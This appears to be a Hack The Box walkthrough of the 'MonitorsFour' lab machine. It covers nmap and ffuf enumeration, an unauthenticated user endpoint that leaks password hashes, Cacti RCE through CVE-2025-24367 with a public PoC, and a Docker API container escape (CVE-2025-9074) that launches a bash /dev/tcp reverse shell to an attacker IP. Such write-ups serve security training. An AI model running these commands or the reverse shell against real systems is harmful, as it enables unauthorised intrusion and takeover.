Platform: Hack The Box
Link: MonitorsFour
Level: Easy
OS: Windows

MonitorsFour starts with the enumeration of a web application and the discovery of a vulnerable endpoint allowing the disclosure of user information. The recovered credentials provide access to both the main interface and a Cacti instance used for network monitoring.

Analysis of the Cacti instance reveals CVE-2025-24367, a vulnerability allowing remote code execution. Exploitation of the flaw leads to initial access within a Docker container hosted on a Windows machine.

Further enumeration of the target identifies an exposed and unauthenticated Docker API. Analysis of the Docker environment reveals CVE-2025-9074, a vulnerability allowing the execution of privileged commands on the host through the Docker Engine API. Exploitation of this flaw ultimately results in container escape and full compromise of the underlying Windows system.

Scanning

nmap -p- --open -T4 -sCV -oA nmap/MonitorsFour {TARGET_IP}

Results

Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-20 07:57 EDT
Nmap scan report for 10.129.48.141
Host is up (0.11s latency).
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx
|_http-title: Did not follow redirect to http://monitorsfour.htb/

5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 177.01 seconds

Nmap finds two open ports:

80 (http) with a nginx web server, and a redirection to monitorsfour.htb

sudo echo "{IP} monitorsfour.htb" | sudo tee -a /etc/hosts

5985 which is the default port for WinRM

Enumeration

Visiting http://monitorsfour.htb/ we find a website for a network monitoring solution.

MonitorsFour website

The web application does not present any exploitable paths so we move on to directory enumeration.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://monitorsfour.htb

MonitorsFour website

A directory named /.env is discovered. We access it at http://monitorsfour.htb/.env.

MonitorsFour env

A file is downloaded. It contains database credentials however we are not able to use it currently.

Next is subdomain enumeration.

ffuf -c -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 100 -u http://monitorsfour.htb -H "Host: FUZZ.monitorsfour.htb" -ic -fs 138

MonitorsFour subdomain enumeration

At http://cacti.monitorsfour.htb we find an instance of cacti with version 1.2.28.

MonitorsFour cacti version

Credentials are needed to login, we return to the main website and take a look at the additional endpoints. /user seems interesting, trying to access it leads to an error because of a missing token parameter.

MonitorsFour user directory

We test the logic and both random value and empty token fail.

curl "http://monitorsfour.htb/user?token=AAAA"

curl "http://monitorsfour.htb/user?token="

token tests

Further testing reveals 0 as a valid value for token

ffuf -u 'http://monitorsfour.htb/user?token=FUZZ' -w /usr/share/seclists/Fuzzing/alphanum-case-extra.txt -ac

user endpoint fuzing

Sending a request returns user credentials.

curl "http://monitorsfour.htb/user?token=0

[
  {
    "id": 2,
    "username": "admin",
    "email": "admin@monitorsfour.htb",
    "password": "56b32eb43e6f15395f6c46c1c9e1cd36",
    "role": "super user",
    "token": "8024b78f83f102da4f",
    "name": "Marcus Higgins",
    "position": "System Administrator",
    "dob": "1978-04-26",
    "start_date": "2021-01-12",
    "salary": "320800.00"
  },
  {
    "id": 5,
    "username": "mwatson",
    "email": "mwatson@monitorsfour.htb",
    "password": "69196959c16b26ef00b77d82cf6eb169",
    "role": "user",
    "token": "0e543210987654321",
    "name": "Michael Watson",
    "position": "Website Administrator",
    "dob": "1985-02-15",
    "start_date": "2021-05-11",
    "salary": "75000.00"
  },
  {
    "id": 6,
    "username": "janderson",
    "email": "janderson@monitorsfour.htb",
    "password": "2a22dcf99190c322d974c8df5ba3256b",
    "role": "user",
    "token": "0e999999999999999",
    "name": "Jennifer Anderson",
    "position": "Network Engineer",
    "dob": "1990-07-16",
    "start_date": "2021-06-20",
    "salary": "68000.00"
  },
  {
    "id": 7,
    "username": "dthompson",
    "email": "dthompson@monitorsfour.htb",
    "password": "8d4a7e7fd08555133e056d9aacb1e519",
    "role": "user",
    "token": "0e111111111111111",
    "name": "David Thompson",
    "position": "Database Manager",
    "dob": "1982-11-23",
    "start_date": "2022-09-15",
    "salary": "83000.00"
  }
]

The admin password is recovered: wonderful1.

marcus password

Using admin:wonderful1 we login into the main website and access the dashboard.

MonitorsFour dashboard

The same credentials do not work on the cacti instance, but marcus:wonderful1 work.

cacti login

We access the dashboard.

cacti dashboard

Initial Foothold

Poking around the dashboard does not reveal anything exploitatble. Searching for cacti vulnerabilities leads to CVE-2025-24367 with a PoC available here.

Environment Prep

git clone https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC.git

cd CVE-2025-24367-Cacti-PoC

python3 -m venv myvenv

source myvenv/bin/activate

Vulnerability Exploitation

sudo python3 exploit.py -url http://cacti.monitorsfour.htb -u marcus -p wonderful1 -i <ATTACKER_IP> -l <LISTERNER_PORT>

CVE-2025-24367

MonitorsFour foothold

The hostname is noteworthy, this is a typical container ID. The target is a Windows machine but we are currently in a Linux container, the user flag is in /home/marcus.

user flag location

Privilege Escalation

We need to escape the container and to access the host system.

Let’s collect some network information.

network data

172.18.0.1 is the Docker bridge gateway / host-side Docker interface and 192.168.65.7 is the upstream DNS or external host reachable from Docker.

A common escape technique is abusing the API so let’s check it.

curl http://192.168.65.7:2375/version

Docker API version

Enumeration of the Docker networking configuration revealed an exposed Docker Remote API accessible at 192.168.65.7:2375. Querying the /version endpoint confirmed unauthenticated access to the Docker daemon. The response identified the environment as Docker Engine Community running on a WSL2-backed Linux kernel (6.6.87.2-microsoft-standard-WSL2).

We enumerate the Docker images.

curl -s http://192.168.65.7:2375/images/json | grep -o '"RepoTags":\[[^]]*\]'

Docker images enumeration

There are three Docker images available on the Docker host. Through research we find that version 28.3.2 (found after querrying /version) correspond to Docker Desktop 4.43.x or newer. Searching for Docker Desktop 4.43.x cve we find CVE-2025-9074, a vulnerability allowing local containers to execute privileged commands on the host via the Docker Engine API.

A PoC is available here. The command below will create a new container.

./cve-2025-9074.sh 192.168.65.7 'bash -c "bash -i >& /dev/tcp/10.10.14.48/9001 0>&1"' 2375

RCE cve_2025_9074

A shell is created on the listener and we can read the root flag at /host_root/mnt/host/c/Users/Administrator/Desktop/root.txt.

Root flag location

HTB: MonitorsFour

Scanning

Enumeration

Initial Foothold

Privilege Escalation